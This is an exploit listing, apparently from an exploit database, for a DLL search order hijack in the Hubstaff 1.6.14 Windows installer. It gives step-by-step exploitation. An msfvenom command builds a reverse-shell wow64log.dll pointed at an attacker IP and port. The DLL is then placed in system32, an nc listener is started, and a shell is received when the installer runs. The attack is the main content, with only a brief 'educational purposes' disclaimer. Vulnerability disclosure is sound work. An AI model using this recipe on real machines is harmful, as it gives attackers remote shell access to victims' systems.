Hubstaff 1.6.1461e5e22e wow64log dll search order hijacking Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-05-23 | Type : local | Platform : windows
This exploit / vulnerability Hubstaff 1.6.1461e5e22e wow64log dll search order hijacking is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
*#Date:* 14/05/2023
*#Exploit Author:* Ahsan Azad
*#Vendor Homepage:* https://hubstaff.com/
*#Software Link:* https://app.hubstaff.com/download
*#Version:* 1.6.13, 1.6.14
*#Tested On:* 64-bit operating system, x64-based processor

*Description*
Hubstaff is an employee work tracker with screenshots, timesheets, billing,
in-depth reports, and more.

During testing. It was found that the system32 subdirectory was missing a
DLL library with the name *wow64log.dll* that had been required by the
hubstaff's setup file during installation. Hence, using Metasploit's
msfvenom to create a new wow64log.dll file, Tester was able to get a
reverse shell locally.


*Exploit*
1- Generate a dll file with the name wow64log.dll using the command:

*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll
-o wow64log.dll*

2- Place the newly generated DLL to the *system32 *directory.
3- Start a listener on attacker's console using:

*nc -lnvp <port_used_while_generating_DLL>*

4- Launch the exe.

Reverse shell will be receive as:


*C:\Windows>*



*Attachments (For the understanding of verification team)*
1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]

2.png - Showing how tester was able to generate a new dll using msfvenom on
port 1337.
[image: 2.png]

3.png - Showing a reverse connection received on the attacker's console
at C:\Windows> by launching the exe.[image: 3.png]